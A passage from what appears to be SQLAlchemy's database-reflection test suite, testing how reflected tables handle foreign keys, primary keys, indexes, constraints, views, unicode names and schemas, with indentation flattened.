Column("user_id", sa.Integer),
)
meta.create_all()
meta2 = MetaData(testing.db)
a2 = Table(
"addresses",
meta2,
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
u2 = Table("users", meta2, autoload=True)
assert len(a2.c.user_id.foreign_keys) == 1
assert len(a2.foreign_keys) == 1
assert [c.parent for c in a2.foreign_keys] == [a2.c.user_id]
assert [c.parent for c in a2.c.user_id.foreign_keys] == [a2.c.user_id]
assert list(a2.c.user_id.foreign_keys)[0].parent is a2.c.user_id
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.user_id)
meta3 = MetaData(testing.db)
u3 = Table("users", meta3, autoload=True)
a3 = Table(
"addresses",
meta3,
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
assert u3.join(a3).onclause.compare(u3.c.id == a3.c.user_id)
meta4 = MetaData(testing.db)
u4 = Table(
"users",
meta4,
Column("id", sa.Integer, key="u_id", primary_key=True),
autoload=True,
)
a4 = Table(
"addresses",
meta4,
Column("id", sa.Integer, key="street", primary_key=True),
Column("street", sa.String(30), key="user_id"),
Column(
"user_id", sa.Integer, sa.ForeignKey("users.u_id"), key="id"
),
autoload=True,
)
assert u4.join(a4).onclause.compare(u4.c.u_id == a4.c.id)
assert list(u4.primary_key) == [u4.c.u_id]
assert len(u4.columns) == 2
assert len(u4.constraints) == 1
assert len(a4.columns) == 3
assert len(a4.constraints) == 2
@testing.provide_metadata
def test_override_composite_fk(self):
"""Test double-remove of composite foreign key, when replaced."""
metadata = self.metadata
Table(
"a",
metadata,
Column("x", sa.Integer, primary_key=True),
Column("y", sa.Integer, primary_key=True),
)
Table(
"b",
metadata,
Column("x", sa.Integer, primary_key=True),
Column("y", sa.Integer, primary_key=True),
sa.ForeignKeyConstraint(["x", "y"], ["a.x", "a.y"]),
)
metadata.create_all()
meta2 = MetaData()
c1 = Column("x", sa.Integer, primary_key=True)
c2 = Column("y", sa.Integer, primary_key=True)
f1 = sa.ForeignKeyConstraint(["x", "y"], ["a.x", "a.y"])
b1 = Table(
"b", meta2, c1, c2, f1, autoload=True, autoload_with=testing.db
)
assert b1.c.x is c1
assert b1.c.y is c2
assert f1 in b1.constraints
assert len(b1.constraints) == 2
@testing.provide_metadata
def test_override_keys(self):
"""test that columns can be overridden with a 'key',
and that ForeignKey targeting during reflection still works."""
meta = self.metadata
Table(
"a",
meta,
Column("x", sa.Integer, primary_key=True),
Column("z", sa.Integer),
test_needs_fk=True,
)
Table(
"b",
meta,
Column("y", sa.Integer, sa.ForeignKey("a.x")),
test_needs_fk=True,
)
meta.create_all()
m2 = MetaData(testing.db)
a2 = Table(
"a",
m2,
Column("x", sa.Integer, primary_key=True, key="x1"),
autoload=True,
)
b2 = Table("b", m2, autoload=True)
assert a2.join(b2).onclause.compare(a2.c.x1 == b2.c.y)
assert b2.c.y.references(a2.c.x1)
@testing.provide_metadata
def test_nonreflected_fk_raises(self):
"""test that a NoReferencedColumnError is raised when reflecting
a table with an FK to another table which has not included the target
column in its reflection.
"""
meta = self.metadata
Table(
"a",
meta,
Column("x", sa.Integer, primary_key=True),
Column("z", sa.Integer),
test_needs_fk=True,
)
Table(
"b",
meta,
Column("y", sa.Integer, sa.ForeignKey("a.x")),
test_needs_fk=True,
)
meta.create_all()
m2 = MetaData(testing.db)
a2 = Table("a", m2, include_columns=["z"], autoload=True)
b2 = Table("b", m2, autoload=True)
assert_raises(sa.exc.NoReferencedColumnError, a2.join, b2)
@testing.exclude("mysql", "<", (4, 1, 1), "innodb funkiness")
@testing.provide_metadata
def test_override_existing_fk(self):
"""test that you can override columns and specify new foreign
keys to other reflected tables, on columns which *do* already
have that foreign key, and that the FK is not duped. """
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
test_needs_fk=True,
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData(testing.db)
a2 = Table(
"addresses",
meta2,
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
u2 = Table("users", meta2, autoload=True)
s = sa.select([a2])
assert s.c.user_id is not None
assert len(a2.foreign_keys) == 1
assert len(a2.c.user_id.foreign_keys) == 1
assert len(a2.constraints) == 2
assert [c.parent for c in a2.foreign_keys] == [a2.c.user_id]
assert [c.parent for c in a2.c.user_id.foreign_keys] == [a2.c.user_id]
assert list(a2.c.user_id.foreign_keys)[0].parent is a2.c.user_id
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.user_id)
meta2 = MetaData(testing.db)
u2 = Table(
"users",
meta2,
Column("id", sa.Integer, primary_key=True),
autoload=True,
)
a2 = Table(
"addresses",
meta2,
Column("id", sa.Integer, primary_key=True),
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
s = sa.select([a2])
assert s.c.user_id is not None
assert len(a2.foreign_keys) == 1
assert len(a2.c.user_id.foreign_keys) == 1
assert len(a2.constraints) == 2
assert [c.parent for c in a2.foreign_keys] == [a2.c.user_id]
assert [c.parent for c in a2.c.user_id.foreign_keys] == [a2.c.user_id]
assert list(a2.c.user_id.foreign_keys)[0].parent is a2.c.user_id
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.user_id)
@testing.only_on(["postgresql", "mysql"])
@testing.provide_metadata
def test_fk_options(self):
"""test that foreign key reflection includes options (on
backends with {dialect}.get_foreign_keys() support)"""
if testing.against("postgresql"):
test_attrs = (
"match",
"onupdate",
"ondelete",
"deferrable",
"initially",
)
addresses_user_id_fkey = sa.ForeignKey(
# Each option is specifically not a Postgres default, or
# it won't be returned by PG's inspection
"users.id",
name="addresses_user_id_fkey",
match="FULL",
onupdate="RESTRICT",
ondelete="RESTRICT",
deferrable=True,
initially="DEFERRED",
)
elif testing.against("mysql"):
# MATCH, DEFERRABLE, and INITIALLY cannot be defined for MySQL
# ON UPDATE and ON DELETE have defaults of RESTRICT, which are
# elided by MySQL's inspection
addresses_user_id_fkey = sa.ForeignKey(
"users.id",
name="addresses_user_id_fkey",
onupdate="CASCADE",
ondelete="CASCADE",
)
test_attrs = ("onupdate", "ondelete")
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
test_needs_fk=True,
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("user_id", sa.Integer, addresses_user_id_fkey),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
meta2.reflect(testing.db)
for fk in meta2.tables["addresses"].foreign_keys:
ref = addresses_user_id_fkey
for attr in test_attrs:
eq_(getattr(fk, attr), getattr(ref, attr))
def test_pks_not_uniques(self):
"""test that primary key reflection not tripped up by unique
indexes"""
testing.db.execute(
"""
CREATE TABLE book (
id INTEGER NOT NULL,
title VARCHAR(100) NOT NULL,
series INTEGER,
series_id INTEGER,
UNIQUE(series, series_id),
PRIMARY KEY(id)
)"""
)
try:
metadata = MetaData(bind=testing.db)
book = Table("book", metadata, autoload=True)
assert book.primary_key.contains_column(book.c.id)
assert not book.primary_key.contains_column(book.c.series)
assert len(book.primary_key) == 1
finally:
testing.db.execute("drop table book")
def test_fk_error(self):
metadata = MetaData(testing.db)
Table(
"slots",
metadata,
Column("slot_id", sa.Integer, primary_key=True),
Column("pkg_id", sa.Integer, sa.ForeignKey("pkgs.pkg_id")),
Column("slot", sa.String(128)),
)
assert_raises_message(
sa.exc.InvalidRequestError,
"Foreign key associated with column 'slots.pkg_id' "
"could not find table 'pkgs' with which to generate "
"a foreign key to target column 'pkg_id'",
metadata.create_all,
)
def test_composite_pks(self):
"""test reflection of a composite primary key"""
testing.db.execute(
"""
CREATE TABLE book (
id INTEGER NOT NULL,
isbn VARCHAR(50) NOT NULL,
title VARCHAR(100) NOT NULL,
series INTEGER NOT NULL,
series_id INTEGER NOT NULL,
UNIQUE(series, series_id),
PRIMARY KEY(id, isbn)
)"""
)
try:
metadata = MetaData(bind=testing.db)
book = Table("book", metadata, autoload=True)
assert book.primary_key.contains_column(book.c.id)
assert book.primary_key.contains_column(book.c.isbn)
assert not book.primary_key.contains_column(book.c.series)
assert len(book.primary_key) == 2
finally:
testing.db.execute("drop table book")
@testing.exclude("mysql", "<", (4, 1, 1), "innodb funkiness")
@testing.provide_metadata
def test_composite_fk(self):
"""test reflection of composite foreign keys"""
meta = self.metadata
multi = Table(
"multi",
meta,
Column("multi_id", sa.Integer, primary_key=True),
Column("multi_rev", sa.Integer, primary_key=True),
Column("multi_hoho", sa.Integer, primary_key=True),
Column("name", sa.String(50), nullable=False),
Column("val", sa.String(100)),
test_needs_fk=True,
)
multi2 = Table(
"multi2",
meta,
Column("id", sa.Integer, primary_key=True),
Column("foo", sa.Integer),
Column("bar", sa.Integer),
Column("lala", sa.Integer),
Column("data", sa.String(50)),
sa.ForeignKeyConstraint(
["foo", "bar", "lala"],
["multi.multi_id", "multi.multi_rev", "multi.multi_hoho"],
),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
table = Table("multi", meta2, autoload=True, autoload_with=testing.db)
table2 = Table(
"multi2", meta2, autoload=True, autoload_with=testing.db
)
self.assert_tables_equal(multi, table)
self.assert_tables_equal(multi2, table2)
j = sa.join(table, table2)
self.assert_(
sa.and_(
table.c.multi_id == table2.c.foo,
table.c.multi_rev == table2.c.bar,
table.c.multi_hoho == table2.c.lala,
).compare(j.onclause)
)
@testing.crashes("oracle", "FIXME: unknown, confirm not fails_on")
@testing.requires.check_constraints
@testing.provide_metadata
def test_reserved(self):
# check a table that uses a SQL reserved name doesn't cause an
# error
meta = self.metadata
table_a = Table(
"select",
meta,
Column("not", sa.Integer, primary_key=True),
Column("from", sa.String(12), nullable=False),
sa.UniqueConstraint("from", name="when"),
)
sa.Index("where", table_a.c["from"])
# There's currently no way to calculate identifier case
# normalization in isolation, so...
if testing.against("firebird", "oracle"):
check_col = "TRUE"
else:
check_col = "true"
quoter = meta.bind.dialect.identifier_preparer.quote_identifier
Table(
"false",
meta,
Column("create", sa.Integer, primary_key=True),
Column("true", sa.Integer, sa.ForeignKey("select.not")),
sa.CheckConstraint("%s <> 1" % quoter(check_col), name="limit"),
)
table_c = Table(
"is",
meta,
Column("or", sa.Integer, nullable=False, primary_key=True),
Column("join", sa.Integer, nullable=False, primary_key=True),
sa.PrimaryKeyConstraint("or", "join", name="to"),
)
index_c = sa.Index("else", table_c.c.join)
meta.create_all()
index_c.drop()
meta2 = MetaData(testing.db)
Table("select", meta2, autoload=True)
Table("false", meta2, autoload=True)
Table("is", meta2, autoload=True)
@testing.provide_metadata
def _test_reflect_uses_bind(self, fn):
from sqlalchemy.pool import AssertionPool
e = engines.testing_engine(options={"poolclass": AssertionPool})
fn(e)
@testing.uses_deprecated()
def test_reflect_uses_bind_constructor_conn(self):
self._test_reflect_uses_bind(
lambda e: MetaData(e.connect(), reflect=True)
)
@testing.uses_deprecated()
def test_reflect_uses_bind_constructor_engine(self):
self._test_reflect_uses_bind(lambda e: MetaData(e, reflect=True))
def test_reflect_uses_bind_constructor_conn_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData(e.connect()).reflect())
def test_reflect_uses_bind_constructor_engine_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData(e).reflect())
def test_reflect_uses_bind_conn_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData().reflect(e.connect()))
def test_reflect_uses_bind_engine_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData().reflect(e))
@testing.provide_metadata
def test_reflect_all(self):
existing = testing.db.table_names()
names = ["rt_%s" % name for name in ("a", "b", "c", "d", "e")]
nameset = set(names)
for name in names:
# be sure our starting environment is sane
self.assert_(name not in existing)
self.assert_("rt_f" not in existing)
baseline = self.metadata
for name in names:
Table(name, baseline, Column("id", sa.Integer, primary_key=True))
baseline.create_all()
m1 = MetaData(testing.db)
self.assert_(not m1.tables)
m1.reflect()
self.assert_(nameset.issubset(set(m1.tables.keys())))
m2 = MetaData()
m2.reflect(testing.db, only=["rt_a", "rt_b"])
self.assert_(set(m2.tables.keys()) == set(["rt_a", "rt_b"]))
m3 = MetaData()
c = testing.db.connect()
m3.reflect(bind=c, only=lambda name, meta: name == "rt_c")
self.assert_(set(m3.tables.keys()) == set(["rt_c"]))
m4 = MetaData(testing.db)
assert_raises_message(
sa.exc.InvalidRequestError,
r"Could not reflect: requested table\(s\) not available in "
r"Engine\(.*?\): \(rt_f\)",
m4.reflect,
only=["rt_a", "rt_f"],
)
m5 = MetaData(testing.db)
m5.reflect(only=[])
self.assert_(not m5.tables)
m6 = MetaData(testing.db)
m6.reflect(only=lambda n, m: False)
self.assert_(not m6.tables)
m7 = MetaData(testing.db)
m7.reflect()
self.assert_(nameset.issubset(set(m7.tables.keys())))
m8 = MetaData()
assert_raises(sa.exc.UnboundExecutionError, m8.reflect)
m8_e1 = MetaData(testing.db)
rt_c = Table("rt_c", m8_e1)
m8_e1.reflect(extend_existing=True)
eq_(set(m8_e1.tables.keys()), set(names))
eq_(rt_c.c.keys(), ["id"])
m8_e2 = MetaData(testing.db)
rt_c = Table("rt_c", m8_e2)
m8_e2.reflect(extend_existing=True, only=["rt_a", "rt_c"])
eq_(set(m8_e2.tables.keys()), set(["rt_a", "rt_c"]))
eq_(rt_c.c.keys(), ["id"])
if existing:
print("Other tables present in database, skipping some checks.")
else:
baseline.drop_all()
m9 = MetaData(testing.db)
m9.reflect()
self.assert_(not m9.tables)
@testing.provide_metadata
def test_reflect_all_unreflectable_table(self):
names = ["rt_%s" % name for name in ("a", "b", "c", "d", "e")]
for name in names:
Table(
name, self.metadata, Column("id", sa.Integer, primary_key=True)
)
self.metadata.create_all()
m = MetaData()
reflecttable = testing.db.dialect.reflecttable
def patched(conn, table, *arg, **kw):
if table.name == "rt_c":
raise sa.exc.UnreflectableTableError("Can't reflect rt_c")
else:
return reflecttable(conn, table, *arg, **kw)
with mock.patch.object(testing.db.dialect, "reflecttable", patched):
with expect_warnings("Skipping table rt_c: Can't reflect rt_c"):
m.reflect(bind=testing.db)
assert_raises_message(
sa.exc.UnreflectableTableError,
"Can't reflect rt_c",
Table,
"rt_c",
m,
autoload_with=testing.db,
)
def test_reflect_all_conn_closing(self):
m1 = MetaData()
c = testing.db.connect()
m1.reflect(bind=c)
assert not c.closed
def test_inspector_conn_closing(self):
c = testing.db.connect()
inspect(c)
assert not c.closed
@testing.provide_metadata
def test_index_reflection(self):
m1 = self.metadata
t1 = Table(
"party",
m1,
Column("id", sa.Integer, nullable=False),
Column("name", sa.String(20), index=True),
)
sa.Index("idx1", t1.c.id, unique=True)
sa.Index("idx2", t1.c.name, t1.c.id, unique=False)
m1.create_all()
m2 = MetaData(testing.db)
t2 = Table("party", m2, autoload=True)
assert len(t2.indexes) == 3
# Make sure indexes are in the order we expect them in
tmp = [(idx.name, idx) for idx in t2.indexes]
tmp.sort()
r1, r2, r3 = [idx[1] for idx in tmp]
assert r1.name == "idx1"
assert r2.name == "idx2"
assert r1.unique == True # noqa
assert r2.unique == False # noqa
assert r3.unique == False # noqa
assert set([t2.c.id]) == set(r1.columns)
assert set([t2.c.name, t2.c.id]) == set(r2.columns)
assert set([t2.c.name]) == set(r3.columns)
@testing.requires.comment_reflection
@testing.provide_metadata
def test_comment_reflection(self):
m1 = self.metadata
Table(
"sometable",
m1,
Column("id", sa.Integer, comment="c1 comment"),
comment="t1 comment",
)
m1.create_all()
m2 = MetaData(testing.db)
t2 = Table("sometable", m2, autoload=True)
eq_(t2.comment, "t1 comment")
eq_(t2.c.id.comment, "c1 comment")
t3 = Table("sometable", m2, extend_existing=True)
eq_(t3.comment, "t1 comment")
eq_(t3.c.id.comment, "c1 comment")
@testing.requires.check_constraint_reflection
@testing.provide_metadata
def test_check_constraint_reflection(self):
m1 = self.metadata
Table(
"x",
m1,
Column("q", Integer),
sa.CheckConstraint("q > 10", name="ck1"),
)
m1.create_all()
m2 = MetaData(testing.db)
t2 = Table("x", m2, autoload=True)
ck = [
const
for const in t2.constraints
if isinstance(const, sa.CheckConstraint)
][0]
eq_regex(ck.sqltext.text, r"[\(`]*q[\)`]* > 10")
eq_(ck.name, "ck1")
@testing.provide_metadata
def test_index_reflection_cols_busted(self):
t = Table(
"x", self.metadata, Column("a", Integer), Column("b", Integer)
)
sa.Index("x_ix", t.c.a, t.c.b)
self.metadata.create_all()
def mock_get_columns(self, connection, table_name, **kw):
return [{"name": "b", "type": Integer, "primary_key": False}]
with testing.mock.patch.object(
testing.db.dialect, "get_columns", mock_get_columns
):
m = MetaData()
with testing.expect_warnings(
"index key 'a' was not located in columns"
):
t = Table("x", m, autoload=True, autoload_with=testing.db)
eq_(list(t.indexes)[0].columns, [t.c.b])
@testing.requires.views
@testing.provide_metadata
def test_views(self):
metadata = self.metadata
users, addresses, dingalings = createTables(metadata)
try:
metadata.create_all()
_create_views(metadata.bind, None)
m2 = MetaData(testing.db)
users_v = Table("users_v", m2, autoload=True)
addresses_v = Table("email_addresses_v", m2, autoload=True)
for c1, c2 in zip(users_v.c, users.c):
eq_(c1.name, c2.name)
self.assert_types_base(c1, c2)
for c1, c2 in zip(addresses_v.c, addresses.c):
eq_(c1.name, c2.name)
self.assert_types_base(c1, c2)
finally:
_drop_views(metadata.bind)
@testing.requires.views
@testing.provide_metadata
def test_reflect_all_with_views(self):
metadata = self.metadata
users, addresses, dingalings = createTables(metadata, None)
try:
metadata.create_all()
_create_views(metadata.bind, None)
m2 = MetaData(testing.db)
m2.reflect(views=False)
eq_(
set(m2.tables), set(["users", "email_addresses", "dingalings"])
)
m2 = MetaData(testing.db)
m2.reflect(views=True)
eq_(
set(m2.tables),
set(
[
"email_addresses_v",
"users_v",
"users",
"dingalings",
"email_addresses",
]
),
)
finally:
_drop_views(metadata.bind)
class CreateDropTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global metadata, users
metadata = MetaData()
users = Table(
"users",
metadata,
Column(
"user_id",
sa.Integer,
sa.Sequence("user_id_seq", optional=True),
primary_key=True,
),
Column("user_name", sa.String(40)),
)
Table(
"email_addresses",
metadata,
Column(
"address_id",
sa.Integer,
sa.Sequence("address_id_seq", optional=True),
primary_key=True,
),
Column("user_id", sa.Integer, sa.ForeignKey(users.c.user_id)),
Column("email_address", sa.String(40)),
)
Table(
"orders",
metadata,
Column(
"order_id",
sa.Integer,
sa.Sequence("order_id_seq", optional=True),
primary_key=True,
),
Column("user_id", sa.Integer, sa.ForeignKey(users.c.user_id)),
Column("description", sa.String(50)),
Column("isopen", sa.Integer),
)
Table(
"items",
metadata,
Column(
"item_id",
sa.INT,
sa.Sequence("items_id_seq", optional=True),
primary_key=True,
),
Column("order_id", sa.INT, sa.ForeignKey("orders")),
Column("item_name", sa.VARCHAR(50)),
)
def test_sorter(self):
tables = metadata.sorted_tables
table_names = [t.name for t in tables]
ua = [n for n in table_names if n in ("users", "email_addresses")]
oi = [n for n in table_names if n in ("orders", "items")]
eq_(ua, ["users", "email_addresses"])
eq_(oi, ["orders", "items"])
def test_checkfirst(self):
try:
assert not users.exists(testing.db)
users.create(bind=testing.db)
assert users.exists(testing.db)
users.create(bind=testing.db, checkfirst=True)
users.drop(bind=testing.db)
users.drop(bind=testing.db, checkfirst=True)
assert not users.exists(bind=testing.db)
users.create(bind=testing.db, checkfirst=True)
users.drop(bind=testing.db)
finally:
metadata.drop_all(bind=testing.db)
def test_createdrop(self):
metadata.create_all(bind=testing.db)
eq_(testing.db.has_table("items"), True)
eq_(testing.db.has_table("email_addresses"), True)
metadata.create_all(bind=testing.db)
eq_(testing.db.has_table("items"), True)
metadata.drop_all(bind=testing.db)
eq_(testing.db.has_table("items"), False)
eq_(testing.db.has_table("email_addresses"), False)
metadata.drop_all(bind=testing.db)
eq_(testing.db.has_table("items"), False)
def test_tablenames(self):
metadata.create_all(bind=testing.db)
# we only check to see if all the explicitly created tables are
# there, rather than assertEqual -- the test db could have
# "extra" tables if there is a misconfigured template. (*cough*
# tsearch2 w/ the pg windows installer.)
self.assert_(not set(metadata.tables) - set(testing.db.table_names()))
metadata.drop_all(bind=testing.db)
class SchemaManipulationTest(fixtures.TestBase):
__backend__ = True
def test_append_constraint_unique(self):
meta = MetaData()
users = Table("users", meta, Column("id", sa.Integer))
addresses = Table(
"addresses",
meta,
Column("id", sa.Integer),
Column("user_id", sa.Integer),
)
fk = sa.ForeignKeyConstraint(["user_id"], [users.c.id])
addresses.append_constraint(fk)
addresses.append_constraint(fk)
assert len(addresses.c.user_id.foreign_keys) == 1
assert addresses.constraints == set([addresses.primary_key, fk])
class UnicodeReflectionTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
cls.metadata = metadata = MetaData()
no_multibyte_period = set([("plain", "col_plain", "ix_plain")])
no_has_table = [
(
"no_has_table_1",
ue("col_Unit\u00e9ble"),
ue("ix_Unit\u00e9ble"),
),
("no_has_table_2", ue("col_\u6e2c\u8a66"), ue("ix_\u6e2c\u8a66")),
]
no_case_sensitivity = [
(
ue("\u6e2c\u8a66"),
ue("col_\u6e2c\u8a66"),
ue("ix_\u6e2c\u8a66"),
),
(
ue("unit\u00e9ble"),
ue("col_unit\u00e9ble"),
ue("ix_unit\u00e9ble"),
),
]
full = [
(
ue("Unit\u00e9ble"),
ue("col_Unit\u00e9ble"),
ue("ix_Unit\u00e9ble"),
),
(
ue("\u6e2c\u8a66"),
ue("col_\u6e2c\u8a66"),
ue("ix_\u6e2c\u8a66"),
),
]
# as you can see, our options for this kind of thing
# are really limited unless you're on PG or SQLite
# forget about it on these backends
if not testing.requires.unicode_ddl.enabled:
names = no_multibyte_period
# mysql can't handle casing usually
elif (
testing.against("mysql")
and not testing.requires.mysql_fully_case_sensitive.enabled
):
names = no_multibyte_period.union(no_case_sensitivity)
# mssql + pyodbc + freetds can't compare multibyte names to
# information_schema.tables.table_name
elif testing.against("mssql"):
names = no_multibyte_period.union(no_has_table)
else:
names = no_multibyte_period.union(full)
for tname, cname, ixname in names:
t = Table(
tname,
metadata,
Column(
"id",
sa.Integer,
sa.Sequence(cname + "_id_seq"),
primary_key=True,
),
Column(cname, Integer),
)
schema.Index(ixname, t.c[cname])
metadata.create_all(testing.db)
cls.names = names
@classmethod
def teardown_class(cls):
cls.metadata.drop_all(testing.db, checkfirst=False)
@testing.requires.unicode_connections
def test_has_table(self):
for tname, cname, ixname in self.names:
assert testing.db.has_table(tname), "Can't detect name %s" % tname
@testing.requires.unicode_connections
def test_basic(self):
# the 'convert_unicode' should not get in the way of the
# reflection process. reflecttable for oracle, postgresql
# (others?) expect non-unicode strings in result sets/bind
# params
bind = testing.db
names = set([rec[0] for rec in self.names])
reflected = set(bind.table_names())
# Jython 2.5 on Java 5 lacks unicodedata.normalize
if not names.issubset(reflected) and hasattr(unicodedata, "normalize"):
# Python source files in the utf-8 coding seem to
# normalize literals as NFC (and the above are
# explicitly NFC). Maybe this database normalizes NFD
# on reflection.
nfc = set([unicodedata.normalize("NFC", n) for n in names])
self.assert_(nfc == names)
# Yep. But still ensure that bulk reflection and
# create/drop work with either normalization.
r = MetaData(bind)
r.reflect()
r.drop_all(checkfirst=False)
r.create_all(checkfirst=False)
@testing.requires.unicode_connections
def test_get_names(self):
inspector = inspect(testing.db)
names = dict(
(tname, (cname, ixname)) for tname, cname, ixname in self.names
)
for tname in inspector.get_table_names():
assert tname in names
eq_(
[
(rec["name"], rec["column_names"][0])
for rec in inspector.get_indexes(tname)
],
[(names[tname][1], names[tname][0])],
)
class SchemaTest(fixtures.TestBase):
__backend__ = True
@testing.requires.schemas
@testing.requires.cross_schema_fk_reflection
def test_has_schema(self):
if not hasattr(testing.db.dialect, "has_schema"):
testing.config.skip_test(
"dialect %s doesn't have a has_schema method"
% testing.db.dialect.name
)
eq_(
testing.db.dialect.has_schema(
testing.db, testing.config.test_schema
),
True,
)
eq_(
testing.db.dialect.has_schema(testing.db, "sa_fake_schema_123"),
False,
)
@testing.requires.schemas
@testing.requires.cross_schema_fk_reflection
@testing.requires.implicit_default_schema
@testing.provide_metadata
def test_blank_schema_arg(self):
metadata = self.metadata
Table(
"some_table",
metadata,
Column("id", Integer, primary_key=True),
Column("sid", Integer, sa.ForeignKey("some_other_table.id")),
schema=testing.config.test_schema,
test_needs_fk=True,
)
Table(
"some_other_table",
metadata,
Column("id", Integer, primary_key=True),
schema=None,
test_needs_fk=True,
)
metadata.create_all()
with testing.db.connect() as conn:
meta2 = MetaData(conn, schema=testing.config.test_schema)
meta2.reflect()
eq_(
set(meta2.tables),
set(
[
"some_other_table",
"%s.some_table" % testing.config.test_schema,
]
),
)
@testing.requires.schemas
@testing.fails_on("sqlite", "FIXME: unknown")
@testing.fails_on("sybase", "FIXME: unknown")
def test_explicit_default_schema(self):
engine = testing.db
engine.connect().close()
if testing.against("sqlite"):
# Works for CREATE TABLE main.foo, SELECT FROM main.foo, etc.,
# but fails on:
# FOREIGN KEY(col2) REFERENCES main.table1 (col1)
schema = "main"
else:
schema = engine.dialect.default_schema_name
assert bool(schema)
metadata = MetaData(engine)
Table(
"table1",
metadata,
Column("col1", sa.Integer, primary_key=True),
test_needs_fk=True,
schema=schema,
)
Table(
"table2",
metadata,
Column("col1", sa.Integer, primary_key=True),
Column(
"col2", sa.Integer, sa.ForeignKey("%s.table1.col1" % schema)
),
test_needs_fk=True,
schema=schema,
)
try:
metadata.create_all()
metadata.create_all(checkfirst=True)
assert len(metadata.tables) == 2
metadata.clear()
Table("table1", metadata, autoload=True, schema=schema)
Table("table2", metadata, autoload=True, schema=schema)
assert len(metadata.tables) == 2
finally:
metadata.drop_all()
@testing.requires.schemas
@testing.provide_metadata
def test_schema_translation(self):
Table(
"foob",
self.metadata,
Column("q", Integer),
schema=config.test_schema,
)
self.metadata.create_all()
m = MetaData()
map_ = {"foob": config.test_schema}
with config.db.connect().execution_options(
schema_translate_map=map_
) as conn:
t = Table("foob", m, schema="foob", autoload_with=conn)
eq_(t.schema, "foob")
eq_(t.c.keys(), ["q"])
@testing.requires.schemas
@testing.fails_on("sybase", "FIXME: unknown")
def test_explicit_default_schema_metadata(self):
engine = testing.db
if testing.against("sqlite"):
# Works for CREATE TABLE main.foo, SELECT FROM main.foo, etc.,
# but fails on:
# FOREIGN KEY(col2) REFERENCES main.table1 (col1)
schema = "main"
else:
schema = engine.dialect.default_schema_name
assert bool(schema)
metadata = MetaData(engine, schema=schema)
Table(
"table1",
metadata,
Column("col1", sa.Integer, primary_key=True),
test_needs_fk=True,
)
Table(
"table2",
metadata,
Column("col1", sa.Integer, primary_key=True),
Column("col2", sa.Integer, sa.ForeignKey("table1.col1")),
test_needs_fk=True,
)
try:
metadata.create_all()
metadata.create_all(checkfirst=True)
assert len(metadata.tables) == 2
metadata.clear()
Table("table1", metadata, autoload=True)
Table("table2", metadata, autoload=True)
assert len(metadata.tables) == 2
finally:
metadata.drop_all()
@testing.requires.schemas
@testing.provide_metadata
def test_metadata_reflect_schema(self):
metadata = self.metadata
createTables(metadata, testing.config.test_schema)
metadata.create_all()
m2 = MetaData(schema=testing.config.test_schema, bind=testing.db)
m2.reflect()
eq_(
set(m2.tables),
set(
[
"%s.dingalings" % testing.config.test_schema,
"%s.users" % testing.config.test_schema,
"%s.email_addresses" % testing.config.test_schema,
]
),
)
@testing.requires.schemas
@testing.requires.cross_schema_fk_reflection
@testing.requires.implicit_default_schema
@testing.provide_metadata
def test_reflect_all_schemas_default_overlap(self):
t1 = Table("t", self.metadata, Column("id", Integer, primary_key=True))
t2 = Table(
"t",
self.metadata,
Column("id1", sa.ForeignKey("t.id")),
schema=testing.config.test_schema,
)
self.metadata.create_all()
m2 = MetaData()
m2.reflect(testing.db, schema=testing.config.test_schema)
m3 = MetaData()
m3.reflect(testing.db)
m3.reflect(testing.db, schema=testing.config.test_schema)
eq_(
set((t.name, t.schema) for t in m2.tables.values()),
set((t.name, t.schema) for t in m3.tables.values()),
)
# Tests related to engine.reflection
def createTables(meta, schema=None):
if schema:
schema_prefix = schema + "."
else:
schema_prefix = ""
users = Table(
"users",
meta,
Column("user_id", sa.INT, primary_key=True),
Column("user_name", sa.VARCHAR(20), nullable=False),
Column("test1", sa.CHAR(5), nullable=False),
Column("test2", sa.Float(5), nullable=False),
Column("test3", sa.Text),
Column("test4", sa.Numeric(10, 2), nullable=False),
Column("test5", sa.Date),
Column(
"parent_user_id",
sa.Integer,
sa.ForeignKey("%susers.user_id" % schema_prefix),
),
Column("test6", sa.Date, nullable=False),
Column("test7", sa.Text),
Column("test8", sa.LargeBinary),
Column("test_passivedefault2", sa.Integer, server_default="5"),
Column("test9", sa.LargeBinary(100)),
Column("test10", sa.Numeric(10, 2)),
schema=schema,
test_needs_fk=True,
)
dingalings = Table(
"dingalings",
meta,
Column("dingaling_id", sa.Integer, primary_key=True),
Column(
"address_id",
sa.Integer,
sa.ForeignKey("%semail_addresses.address_id" % schema_prefix),
),
Column("data", sa.String(30)),
schema=schema,
test_needs_fk=True,
)
addresses = Table(
"email_addresses",
meta,
Column("address_id", sa.Integer),
Column("remote_user_id", sa.Integer, sa.ForeignKey(users.c.user_id)),
Column("email_address", sa.String(20)),
sa.PrimaryKeyConstraint("address_id", name="email_ad_pk"),
schema=schema,
test_needs_fk=True,
)
return (users, addresses, dingalings)
def createIndexes(con, schema=None):
fullname = "users"
if schema:
fullname = "%s.%s" % (schema, "users")
query = "CREATE INDEX users_t_idx ON %s (test1, test2)" % fullname
con.execute(sa.sql.text(query))
@testing.requires.views
def _create_views(con, schema=None):
for table_name in ("users", "email_addresses"):
fullname = table_name
if schema:
fullname = "%s.%s" % (schema, table_name)
view_name = fullname + "_v"
